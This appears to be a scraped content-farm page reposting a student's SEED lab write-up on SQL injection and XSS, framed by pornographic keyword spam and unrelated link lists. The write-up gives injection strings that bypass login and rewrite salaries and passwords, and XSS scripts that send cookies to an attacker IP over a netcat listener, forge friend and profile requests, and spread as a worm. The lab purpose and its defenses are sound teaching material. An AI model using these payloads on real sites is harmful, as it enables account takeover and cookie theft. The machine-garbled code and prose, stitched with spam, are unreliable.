亚洲国产成人,色呦呦内射午夜,无码一级片,无码人妻少妇色欲AV一区二区

<samp id="jg8hh"></samp>

<p id="jg8hh"></p><delect id="jg8hh"><em id="jg8hh"><blockquote id="jg8hh"></blockquote></em></delect><acronym id="jg8hh"><dd id="jg8hh"></dd></acronym><button id="jg8hh"><dd id="jg8hh"><acronym id="jg8hh"></acronym></dd></button><samp id="jg8hh"><em id="jg8hh"><blockquote id="jg8hh"></blockquote></em></samp>

<p id="jg8hh"></p>

<samp id="jg8hh"><legend id="jg8hh"></legend></samp>
<samp id="jg8hh"><legend id="jg8hh"><samp id="jg8hh"></samp></legend></samp>

<samp id="jg8hh"></samp>

<p id="jg8hh"></p><acronym id="jg8hh"></acronym><p id="jg8hh"><dd id="jg8hh"><acronym id="jg8hh"></acronym></dd></p><p id="jg8hh"></p>

<p id="jg8hh"></p><delect id="jg8hh"><legend id="jg8hh"><var id="jg8hh"></var></legend></delect><button id="jg8hh"><listing id="jg8hh"><i id="jg8hh"></i></listing></button>
<delect id="jg8hh"><legend id="jg8hh"><var id="jg8hh"></var></legend></delect>

網絡攻防實踐心得體會(網絡攻防技術與實踐課后答案)

發(fā)布時間:2023-11-11
本文主要介紹網絡攻防實戰(zhàn)經驗(網絡攻防技術與實踐課后回答),下面一起看看網絡攻防實戰(zhàn)經驗(網絡攻防技術與實踐課后回答)相關資訊。
20212917余2021-2022-2第十周作業(yè)目錄1。實驗要求和過程2。學習中的問題及解決方法。學習感受和體驗1。實驗需求和流程seed sql注入攻擊和防御實驗我們已經創(chuàng)建了一個web應用程序,并將其托管在。這個web應用程序是一個簡單的員工管理應用程序。員工可以通過這個web應用程序查看和更新數據庫中的個人信息。這個web應用程序有兩個主要角色:管理員是一個特權角色,可以管理每個員工的個人數據信息。員工擔任常規(guī)角色,可以查看或更新他們的個人數據。完成以下任務:
首先,熟悉sql語句:我們創(chuàng)建了一個名為users的數據庫,其中包含一個名為credit的表。該表存儲每個雇員的個人信息(例如,eid、密碼、工資、ssn等。).在此任務中,您需要使用數據庫來熟悉sql查詢。二、sql注入對select語句的攻擊:上述web應用存在一個sql輸入漏洞,任務是在不知道密碼的情況下登錄web應用。第三,sql注入對更新語句的攻擊:sql注入對更新語句的攻擊是通過employee s更新的個人界面。四、sql對策:修復上述sql注入攻擊漏洞。一、熟悉sql語句(1)要托管網站的apache2服務器,請先使用指令sudo service apache2 start啟動apache服務。首先,使用命令mysql -u root -pseedubuntu登錄mysql數據庫,-u指定用戶名,-p指定密碼。然后使用指令使用用戶;顯示表格;看看數據庫下面的表格。
(2)下面我們使用指令select * from credential打印所有員工的信息,在這里你可以看到員工 散列后的姓名、工資和密碼。
二、對select語句的sql注入攻擊(1)打開網站seedlabsqlinjection.com,其對應的文件地址是/var/www/sqlinjection。存在sql注入攻擊的主頁unsafe_home.php。我們可以通過vim unsafe_home.php查看相應的源代碼。
(2)分析文件代碼,我們可以看到$ _ get[ ;用戶名和密碼。;]和$_get[這里主要用。密碼和密碼。;]元素,加密的參數通過散列pwd獲得。接下來,使用$input_uname和$input_uname構建sql查詢語句。通過修改 昵稱 ,我們可以實現對sql注入的攻擊。
(3)返回瀏覽器進入登錄界面,使用賬號admin無密碼登錄,成功進入首頁,證明攻擊成功。
(4)也可以使用linux下的自帶工具curl進行sql注入攻擊。具體的命令是卷曲 #密碼=123
(5)看到注射成功,可以返回瀏覽器,用密碼123登錄admin賬號。
三、更新語句的sql注入攻擊(1)看后臺代碼vim/var/www/sql injection/unsafe _ edit _ backend.php找到動態(tài)構造的sql語句,這是sql注入攻擊的關鍵。
(2)輸入 ,工資= 20212917 其中eid = 10000英鎊;在編輯頁面的昵稱字段中;#,在編輯配置文件頁面的昵稱字段中輸入專門構造的昵稱字段,然后單擊保存。
(3)修改他人 的工資。只要輸入 ,工資= 1 其中name = 鮑比 在愛麗絲修改的界面昵稱里;#,然后進入boby的界面,發(fā)現工資已經修改成功。這個原理同上。
(4)假設密碼以sha1的形式存儲在數據庫中,您需要首先獲得指定密碼的sha1值。使用echo-n ;123456。;|sha1sum將密碼123456的sha1值輸出為7 c4 a8 d 09 ca 3762 af 61e 59520943 dc 26494 f 8941 b。
(5)接下來,繼續(xù)用alice 的帳戶,在編輯個人資料中修改用戶名,并填寫 ,密碼= 7 c4 a8 d 09 ca 3762 af 61e 59520943 dc 26494 f 8941 b ;其中name = 愛麗絲 ;#修改sha1值。此時,您可以登錄alice 的帳戶,密碼為123456,您可以正常登錄。攻擊成功了。
四。sql對策(sql注入漏洞的本質原因是執(zhí)行語言。句子和數據放在一起,使用預處理句子機制可以很好的防止這種攻擊。在unsafe_home.php中,我們使用預處理代碼,用之前的登錄,發(fā)現賬號不存在。同樣,我們現在可以防止sql注入攻擊select語句。
$ sql = $ conn-prepare(從憑證中選擇id、姓名、eid、工資、出生、社會保障號、號碼、地址、電子郵件、昵稱、密碼,其中name=?而密碼=? );$ sql-bind _ param( ss ,$input_uname,$ hashed _ pwd);$ sql-execute;$sql-bind_result($id,$name,$eid,$salary,$birth,$ssn,$ phonenumber,$address,$email,$nickname,$ pwd);$ sql-fetch;$ sql-close;(2)更新unsafe_edit_backend.php中的語句代碼,修改代碼,然后通過edit profile修改薪資。發(fā)現剛才的語句顯示為昵稱,于是update語句的反sql注入也就完成了。(記得還原環(huán)境。??!)
if($input_pwd!= ){ //如果密碼字段不為空。$ hashed _ pwd = sha1($ input _ pwd);//更新存儲在會話中的密碼。$ _ session[ ;殘疾人和殘疾人協(xié)會。;]= $ hashed _ pwd;$ sql = $ conn-prepare(更新憑據集昵稱=?,郵箱=?,地址=?,密碼=?,phonenumber=?其中id = $ id );$ sql-bind _ param( sssss 、$input_nickname、$input_email、$input_address、$hashed_pwd、$ input _ phone number);$ sql-執(zhí)行;$ sql-close;}else{ //如果passowrd字段為空。$ sql = $ conn-prepare(更新憑據集昵稱=?,郵箱=?,地址=?,phonenumber=?其中id = $ id );$ sql-bind _ param( ssss 、$input_nickname、$input_email、$input_address、$ input _ phone number);$ sql-execute;$ sql-close;}2.2 seed xss跨站腳本攻擊實驗(elgg)為了演示攻擊者利用xss漏洞可以做什么,我們在預先構建的ubuntu vm鏡像中設置了一個名為elgg的web應用。在這個實驗中,學生需要利用這個漏洞對修改后的elgg發(fā)動xss攻擊。攻擊的最終目標是在用戶中傳播xss蠕蟲,這樣無論誰查看被感染的用戶 的個人數據,它會被感染。
1.發(fā)布惡意消息,顯示報警窗口:在你的elgg個人資料中嵌入javascript程序,這樣當另一個用戶查看你的個人資料時,就會執(zhí)行javascript程序,并顯示報警窗口。第二,彈出窗口顯示cookie信息:顯示cookie信息。第三,偷受害人 s cookies:給攻擊者發(fā)送cookies。四、成為受害者好友:使用js程序添加受害者為好友,無需受害者介入,使用相關工具了解elgg添加好友的過程。第五,修改被害人 使用js程序,當受害者訪問alice 頁面中,信息在沒有干預的情況下被修改。第六,寫xss蠕蟲。七、反對xss的攻擊。1.發(fā)布惡意消息并顯示報警窗口(1)在firefox中登錄網站,用alice 的賬戶。賬號:愛麗絲,密碼:seedalice。登錄后,點擊頭像,選擇編輯個人資料。
(2)輸入腳本警告( xss )在簡述中;/script,單擊保存,將出現xxs警告。主要原因是字段直接插入數據表,沒有經過安全檢查和過濾。在顯示內容時,也是不經過輸出凈化直接讀取顯示。
二、彈出窗口顯示cookie信息(1)在個人主頁的簡要描述中輸入預先設計好的攻擊代碼scr。ipt alert(document . cookie);/腳本。點擊保存后,出現下圖所示的cookie,cookie信息顯示成功。
第三,偷受害人 s cookies(1)使用ifconfig查看你的ip地址。
(2)輸入攻擊代碼script document . write( ;img src = 192 . 168 . 43 . 46 : 5555?c = escape(document . cookie) ; );/script,然后單擊保存。
(3)切換bobby s帳戶,在終端輸入nc -l 5555 -v端口,使用bobby訪問成員中的alice以獲得bobby 的餅干。
第四,成為受害者的朋友(1)使用boby帳戶訪問alic friend = 44 _ _ elgg _ ts = 1652915920amp_ _ elgg _ token = x8w 2 vfgmj 2 vcqgomkruylg
(3)根據上一步中的參數friend,參數__elgg_ts代表時間戳,參數__elgg_token代表令牌,構造攻擊代碼。
腳本類型= 文本/javascript window . onload = function{ var ajax = null;var ts=amp_ _ elgg _ ts = elgg . security . token . _ _ elgg _ ts;var token = _ _ elgg _ token = elgg . security . tok 44 ts令牌;//創(chuàng)建并發(fā)送ajax請求來添加friendajax = new xmlhttprequest;ajax . open( 獲取 ,sendurl,true);setrequestheader( 主持人 , www . xsslabelgg . com );setrequestheader( 內容類型 , 應用程序/x-www-form-urlencoded );ajax . send;} /script(4)把這個程序放到alice s about me(注意這里是編輯html模式)并在alice 關于我的界面。
(5)接下來,利用博比去拜訪愛麗絲 的主頁,bobby會自動加alice為好友。
動詞 (verb的縮寫)修改受害者信息(1)用http header live看看修改信息的時候怎么做。這樣就構造了一個類似上面的javascript程序。
腳本類型= 文本/javascript window . onload = function{//訪問用戶名、用戶guid、時間戳_ _ elgg _ ts//和安全令牌_ _ elgg _ token var username = elgg . session . user . name的javascript代碼;var guid = guid = elgg . session . user . guid;var ts=amp_ _ elgg _ ts = elgg . security . token . _ _ elgg _ ts;var token = _ _ elgg _ token = elgg . security . token . _ _ elgg _ token;var內容=令牌ts ampname = 用戶名和密碼這已經被愛麗絲破解了。/p access level[description]= 2 brief description = access level[brief description]= 2 location = access level[location]= 2 interests = access level[interests]= 2 skills = access level[skills]= 2 contact mail = access level[contact email]= 2 phone = access level[phone]= 2 mobile = access level[mobile]= 2 website = access level[website]= 2 witter = accvar samyguid = 44if(elgg.session.user.guid!= samyguid){//創(chuàng)建并發(fā)送ajax請求以修改配置文件var ajax = nullajax = new xmlhttprequest;ajax . open( 郵政和郵政,sendurl,true);setrequestheader( 主持人 , www . xsslabelgg . com );setrequestheader( 內容類型 , 應用程序/x-www-form-urlencoded );ajax.send(內容);}}/script(2)把上面的代碼放到alice 是關于我的,然后利用鮑比去拜訪愛麗絲 的主頁,這樣鮑比 的配置文件可以成功修改。
六、編寫xss蠕蟲(1)目的是這段代碼可以復制給其他用戶,那么蠕蟲目標就完成了,所以使用dom查看和使用html代碼,innerhtml方法就是開始和結束標記之間的html。把下面的程序放到愛麗絲 是關于我的。
腳本id = 蠕蟲 type = 文本/javascript var headertag = 腳本id = \ 蠕蟲\ type = \ 文本/javascript \ var jscode = document . getelementbyid( 蠕蟲 ).innerhtmlvar tailtag = / 劇本 var worm code = encodeuricomponent(header tag jscode tailtag);警報(jscode);/script(2)訪問alice s profile通過boby發(fā)現這段代碼已經復制成功,說明目標已經達到,利用dom api已經成功復制了蠕蟲。
七。對抗xss攻擊(1)elgg本身提供了對抗xss攻擊的插件。用admin/seedelgg登錄,找到account-administration-plugins,找到插件htmlawed。這個插件的主要功能是檢查用戶 的輸入和輸出,并刪除特定的標簽。
(2)檢查愛麗絲 的個人資料,看看它是否有效??梢钥吹?,xss攻擊此時沒有效果,alice中的代碼顯示為about me。
2.學習中遇到的問題及解決方法1:在1:sql注入中,檢查用戶表中沒有任何內容。
答:顯示表格;;在這個命令中;脫下來,注意很多;的存在?。?br>問題2:在增加受害者 的朋友,點擊愛麗絲 的主頁沒有成功添加好友。
回答:上一步的注入代碼沒有刪除,刪除就好。
3.學習感受和經驗是一種以接觸網為方向的攻防練習。希望在以后的學習中能進一步提高自己的能力。標簽:
語句碼
了解更多網絡攻防實戰(zhàn)經驗(網絡攻防技術與實踐課后回答)相關內容請關注本站點。
上一個:廣東萬年青的形態(tài)特征及觀賞特點
下一個:柔性電纜的安裝注意事項

原裝意大利eltra絕對值編碼器(精準測量工控設備轉速)
金華佛手的栽培管理
大屏幕輕薄本(大屏輕薄筆記本推薦)
imperxcmos 相機ip67
閱讀招標公告時這些事項必需特別注意
在哪里買電腦便宜又正版好,去那買電腦便宜好
ios怎么玩電腦(ios連電腦用什么軟件)
各類硬盤的區(qū)別是什么,計算機硬盤和內存的區(qū)別是什么
你會如何區(qū)分金屬膜電阻和碳膜電阻?
意大利ultra pompe泵